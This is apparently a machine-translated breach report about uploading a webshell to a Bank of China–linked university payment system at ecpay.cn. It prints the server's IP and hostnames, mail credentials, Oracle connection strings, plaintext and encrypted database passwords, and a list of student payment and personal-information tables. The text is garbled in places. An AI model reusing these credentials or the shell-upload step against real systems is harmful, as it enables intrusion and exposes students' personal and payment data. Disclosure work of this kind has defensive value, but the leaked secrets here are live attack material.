The Bank of China paid for a small hole in a website involving a large number of personal information and multiple database information.

The Bank of China paid for a small hole in a website involving a large number of personal information and multiple database information.

Attachment: shell writing skills

I don't know where the actual location of the bank's payment is in Shandong? Is the company recruiting O & M security personnel?

60.208.86.109 failed multiple attempts from no identification to the analysis of config. xml to the Final write horse. Weblogic configuration is too complex, the analysis of the host, and the reverse query can not find the domain name, http://sdau.ecpay.cn found a Shandong Agricultural University registration payment system, the Bank support, suddenly think, you can use the find + css file positioning, the practice of writing a horse, http://sdau.ecpay.cn/2.jsp carry into the discovery of the cave, reg.ecpay.cn service.ecpay.cn are bound to this IP address, through analysis, three available database configurations and primary server mail accounts are obtained. Through database configuration, a large amount of student payment and personal information are found, as well as a large amount of account information, involving some registered accounts. Log on to the mail system and send and receive a large number of emails...


 

 
  smtp.ecpay.cn
 
 
  
   25
  
 
 
  
   [email protected]
  
 
 
  
   [email protected]
  
 
 
  
   server163@@
  
 <:property name="subject">  
     
  
   jdbc:oracle:thin:@192.168.10.22:1521:cecpay
      
  
   oracle.jdbc.OracleDriver
      
        
           
    
     user
            
    
     reg
          
       
      
  
   {AES}CUlK34Fwu5TusdBz69CgGYEqXv/nZHwjUDYtERSTz3M=
    qazsew123a?  
      
   
    jdbc:oracle:thin:@192.168.10.22:1521:cecpay
       
   
    oracle.jdbc.OracleDriver
       
         
            
     
      user
             
     
      service
           
        
       
   
    {AES}I9taZwwh9svbyZHG19KL2Xb0+DZthHCuor7hufFuzdY=
     123456  
       
    
     jdbc:oracle:thin:@192.168.10.22:1521:cecpay
        
    
     oracle.jdbc.OracleDriver
        
          
             
      
       user
              
      
       verify
            
         
        
    
     {AES}K5z7yElWRy9IaLF/XkuCfRqEyCRDcMC3doHOyUzQtNA=
     123456
   
  
 

<: Property name = "subject">

Attach the database and mail configuration data.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Query#0 : select t.TABLE_NAME,t.NUM_ROWS from user_tables t order by NUM_ROWS descTABLE_NAMEVARCHAR2NUM_ROWSNUMBERAPPLY_UPDATE_LOG EXAM_20152016NCZXJF EXAM_2015NXBNYJSYYYSLJBMKS EXAM_2015NXBNYYSLJBMKS EXAM_KS EXAM_NDXYYSLJBMKS EXAM_NFJNPT EXAM_NYYSLJBMKS EXAM_QUERY EXAM_QUERY_GROUP EXAM_QUERY_LOG EXAM_ZZYJSZYKRXKSJFPT REG_ACCOUNT REG_ACC_EXAM REG_ACC_EXAM_PAYMENT REG_ACC_EXAM_PAYMENT_LS REG_BILL REG_BILLD_ETAIL REG_DATA_RIGHT REG_DIC REG_DIC_COPY REG_DIC_DATA REG_DIC_DATA_COPY REG_ENTRY_FORM REG_ENTRY_FORM_ADVANCE REG_ENTRY_FORM_ADVANCE_COPY REG_ENTRY_FORM_COPY REG_ENTRY_FORM_FIELD REG_ENTRY_FORM_FIELD_COPY REG_EXAM REG_EXAM_INSTRUCTION REG_EXAM_NAME REG_EXAM_PAYMENT REG_EXAM_UPLOAD REG_EXAM_UPLOAD_FILE REG_FUNCTION_FOLDER REG_INTERFACE_TEMPLATE REG_MOUDLE REG_ORGCODE REG_RESOURCE REG_RESOURCE_RIGHT REG_ROLE REG_STUDENT_INFO_META REG_TRANSACTION REG_USERCODE REG_VALIDATE_RULE

A database structure.